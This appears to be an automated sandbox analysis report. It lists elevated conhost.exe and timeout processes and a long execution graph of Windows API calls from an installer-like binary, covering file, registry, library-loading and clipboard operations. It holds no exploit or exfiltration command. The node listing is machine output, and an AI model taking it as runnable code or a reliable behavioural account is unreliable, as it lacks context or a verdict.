                                                                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                                                                    Start time:20:02:45
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                    Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                                                                    Start time:20:02:45
                                                                                                                                                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                    Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                    Imagebase:0x390000
                                                                                                                                                                                                                                                                                                    File size:25'088 bytes
                                                                                                                                                                                                                                                                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                                                                      Execution Coverage:17.5%
                                                                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                      Signature Coverage:21%
                                                                                                                                                                                                                                                                                                      Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                      Total number of Limit Nodes:25
                                                                                                                                                                                                                                                                                                      execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 LoadLibraryExW 4561->4563 4564 40241b GetModuleHandleW 4561->4564 4565 4024ce 4563->4565 4566 40243e 4563->4566 4564->4563 4564->4566 4568 404f9e 25 API calls 4565->4568 4578 406391 GlobalAlloc WideCharToMultiByte 4566->4578 4568->4556 4569 402449 4570 40248c 4569->4570 4571 40244f 4569->4571 4572 404f9e 25 API calls 4570->4572 4573 401435 25 API calls 4571->4573 4576 40245f 4571->4576 4574 402496 4572->4574 4573->4576 4575 4062cf 11 API calls 4574->4575 4575->4576 4576->4562 4577 4024c0 FreeLibrary 4576->4577 4577->4562 4579 4063c9 GlobalFree 4578->4579 4580 4063bc GetProcAddress 4578->4580 4579->4569 4580->4579 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4581 4048f8 4582 404906 4581->4582 4583 40491d 4581->4583 4584 40490c 4582->4584 4599 404986 4582->4599 4585 40492b IsWindowVisible 4583->4585 4591 404942 4583->4591 4586 403ddb SendMessageW 4584->4586 4588 404938 4585->4588 4585->4599 4589 404916 4586->4589 4587 40498c CallWindowProcW 4587->4589 4600 40487a SendMessageW 4588->4600 4591->4587 4605 406035 lstrcpynW 4591->4605 4593 404971 4606 405f7d wsprintfW 4593->4606 4595 404978 4596 40141d 80 API calls 4595->4596 4597 40497f 4596->4597 4607 406035 lstrcpynW 4597->4607 4599->4587 4601 4048d7 SendMessageW 4600->4601 4602 40489d GetMessagePos ScreenToClient SendMessageW 4600->4602 4604 4048cf 4601->4604 4603 4048d4 4602->4603 4602->4604 4603->4601 4604->4591 4605->4593 4606->4595 4607->4599 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4608 4020f9 GetDC GetDeviceCaps 4609 401446 18 API calls 4608->4609 4610 402116 MulDiv 4609->4610 4611 401446 18 API calls 4610->4611 4612 40212c 4611->4612 4613 406831 18 API calls 4612->4613 4614 402165 CreateFontIndirectW 4613->4614 4615 4030dc 4614->4615 4616 4030e3 4615->4616 4618 405f7d wsprintfW 4615->4618 4618->4616 4619 4024fb 4620 40145c 18 API calls 4619->4620 4621 402502 4620->4621 4622 40145c 18 API calls 4621->4622 4623 40250c 4622->4623 4624 40145c 18 API calls 4623->4624 4625 402515 4624->4625 4626 40145c 18 API calls 4625->4626 4627 40251f 4626->4627 4628 40145c 18 API calls 4627->4628 4629 402529 4628->4629 4630 40253d 4629->4630 4631 40145c 18 API calls 4629->4631 4632 4062cf 11 API calls 4630->4632 4631->4630 4633 40256a CoCreateInstance 4632->4633 4634 40258c 4633->4634 4635 4026fc 4637 402708 4635->4637 4638 401ee4 4635->4638 4636 406831 18 API calls 4636->4638 4638->4635 4638->4636 3782 4019fd 3783 40145c 18 API calls 3782->3783 3784 401a04 3783->3784 3787 405eab 3784->3787 3788 405eb8 GetTickCount GetTempFileNameW 3787->3788 3789 401a0b 3788->3789 3790 405eee 3788->3790 3790->3788 3790->3789 4639 4022fd 4640 40145c 18 API calls 4639->4640 4641 402304 GetFileVersionInfoSizeW 4640->4641 4642 4030e3 4641->4642 4643 40232b GlobalAlloc 4641->4643 4643->4642 4644 40233f GetFileVersionInfoW 4643->4644 4645 402350 VerQueryValueW 4644->4645 4646 402381 GlobalFree 4644->4646 4645->4646 4647 402369 4645->4647 4646->4642 4652 405f7d wsprintfW 4647->4652 4650 402375 4653 405f7d wsprintfW 4650->4653 4652->4650 4653->4646 4654 402afd 4655 40145c 18 API calls 4654->4655 4656 402b04 4655->4656 4661 405e7c GetFileAttributesW CreateFileW 4656->4661 4658 402b10 4659 4030e3 4658->4659 4662 405f7d wsprintfW 4658->4662 4661->4658 4662->4659 4663 4029ff 4664 401553 19 API calls 4663->4664 4665 402a09 4664->4665 4666 40145c 18 API calls 4665->4666 4667 402a12 4666->4667 4668 402a1f RegQueryValueExW 4667->4668 4672 401a13 4667->4672 4669 402a45 4668->4669 4670 402a3f 4668->4670 4671 4029e4 RegCloseKey 4669->4671 4669->4672 4670->4669 4674 405f7d wsprintfW 4670->4674 4671->4672 4674->4669 4675 401000 4676 401037 BeginPaint GetClientRect 4675->4676 4677 40100c DefWindowProcW 4675->4677 4679 4010fc 4676->4679 4680 401182 4677->4680 4681 401073 CreateBrushIndirect FillRect DeleteObject 4679->4681 4682 401105 4679->4682 4681->4679 4683 401170 EndPaint 4682->4683 4684 40110b CreateFontIndirectW 4682->4684 4683->4680 4684->4683 4685 40111b 6 API calls 4684->4685 4685->4683 4686 401f80 4687 401446 18 API calls 4686->4687 4688 401f88 4687->4688 4689 401446 18 API calls 4688->4689 4690 401f93 4689->4690 4691 401fa3 4690->4691 4692 40145c 18 API calls 4690->4692 4693 401fb3 4691->4693 4694 40145c 18 API calls 4691->4694 4692->4691 4695 402006 4693->4695 4696 401fbc 4693->4696 4694->4693 4697 40145c 18 API calls 4695->4697 4698 401446 18 API calls 4696->4698 4699 40200d 4697->4699 4700 401fc4 4698->4700 4702 40145c 18 API calls 4699->4702 4701 401446 18 API calls 4700->4701 4703 401fce 4701->4703 4704 402016 FindWindowExW 4702->4704 4705 401ff6 SendMessageW 4703->4705 4706 401fd8 SendMessageTimeoutW 4703->4706 4708 402036 4704->4708 4705->4708 4706->4708 4707 4030e3 4708->4707 4710 405f7d wsprintfW 4708->4710 4710->4707 4711 402880 4712 402884 4711->4712 4713 40145c 18 API calls 4712->4713 4714 4028a7 4713->4714 4715 40145c 18 API calls 4714->4715 4716 4028b1 4715->4716 4717 4028ba RegCreateKeyExW 4716->4717 4718 4028e8 4717->4718 4723 4029ef 4717->4723 4719 402934 4718->4719 4721 40145c 18 API calls 4718->4721 4720 402963 4719->4720 4722 401446 18 API calls 4719->4722 4724 4029ae RegSetValueExW 4720->4724 4727 40337f 33 API calls 4720->4727 4725 4028fc lstrlenW 4721->4725 4726 402947 4722->4726 4730 4029c6 RegCloseKey 4724->4730 4731 4029cb 4724->4731 4728 402918 4725->4728 4729 40292a 4725->4729 4733 4062cf 11 API calls 4726->4733 4734 40297b 4727->4734 4735 4062cf 11 API calls 4728->4735 4736 4062cf 11 API calls 4729->4736 4730->4723 4732 4062cf 11 API calls 4731->4732 4732->4730 4733->4720 4742 406250 4734->4742 4739 402922 4735->4739 4736->4719 4739->4724 4741 4062cf 11 API calls 4741->4739 4743 406273 4742->4743 4744 4062b6 4743->4744 4745 406288 wsprintfW 4743->4745 4746 402991 4744->4746 4747 4062bf lstrcatW 4744->4747 4745->4744 4745->4745 4746->4741 4747->4746 4748 403d02 4749 403d0d 4748->4749 4750 403d11 4749->4750 4751 403d14 GlobalAlloc 4749->4751 4751->4750 4752 402082 4753 401446 18 API calls 4752->4753 4754 402093 SetWindowLongW 4753->4754 4755 4030e3 4754->4755 4756 402a84 4757 401553 19 API calls 4756->4757 4758 402a8e 4757->4758 4759 401446 18 API calls 4758->4759 4760 402a98 4759->4760 4761 401a13 4760->4761 4762 402ab2 RegEnumKeyW 4760->4762 4763 402abe RegEnumValueW 4760->4763 4764 402a7e 4762->4764 4763->4761 4763->4764 4764->4761 4765 4029e4 RegCloseKey 4764->4765 4765->4761 4766 402c8a 4767 402ca2 4766->4767 4768 402c8f 4766->4768 4770 40145c 18 API calls 4767->4770 4769 401446 18 API calls 4768->4769 4772 402c97 4769->4772 4771 402ca9 lstrlenW 4770->4771 4771->4772 4773 401a13 4772->4773 4774 402ccb WriteFile 4772->4774 4774->4773 4775 401d8e 4776 40145c 18 API calls 4775->4776 4777 401d95 ExpandEnvironmentStringsW 4776->4777 4778 401da8 4777->4778 4779 401db9 4777->4779 4778->4779 4780 401dad lstrcmpW 4778->4780 4780->4779 4781 401e0f 4782 401446 18 API calls 4781->4782 4783 401e17 4782->4783 4784 401446 18 API calls 4783->4784 4785 401e21 4784->4785 4786 4030e3 4785->4786 4788 405f7d wsprintfW 4785->4788 4788->4786 4789 40438f 4790 4043c8 4789->4790 4791 40439f 4789->4791 4792 403df6 8 API calls 4790->4792 4793 403d6b 19 API calls 4791->4793 4795 4043d4 4792->4795 4794 4043ac SetDlgItemTextW 4793->4794 4794->4790 4796 403f90 4797 403fa0 4796->4797 4798 403fbc 4796->4798 4807 405cb0 GetDlgItemTextW 4797->4807 4800 403fc2 SHGetPathFromIDListW 4798->4800 4801 403fef 4798->4801 4803 403fd2 4800->4803 4806 403fd9 SendMessageW 4800->4806 4802 403fad SendMessageW 4802->4798 4804 40141d 80 API calls 4803->4804 4804->4806 4806->4801 4807->4802 4808 402392 4809 40145c 18 API calls 4808->4809 4810 402399 4809->4810 4813 407224 4810->4813 4814 406efe 25 API calls 4813->4814 4815 407244 4814->4815 4816 4023a7 4815->4816 4817 40724e lstrcpynW lstrcmpW 4815->4817 4818 407280 4817->4818 4819 407286 lstrcpynW 4817->4819 4818->4819 4819->4816 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4820 402797 4821 40145c 18 API calls 4820->4821 4822 4027ae 4821->4822 4823 40145c 18 API calls 4822->4823 4824 4027b7 4823->4824 4825 40145c 18 API calls 4824->4825 4826 4027c0 GetPrivateProfileStringW lstrcmpW 4825->4826 4827 401e9a 4828 40145c 18 API calls 4827->4828 4829 401ea1 4828->4829 4830 401446 18 API calls 4829->4830 4831 401eab wsprintfW 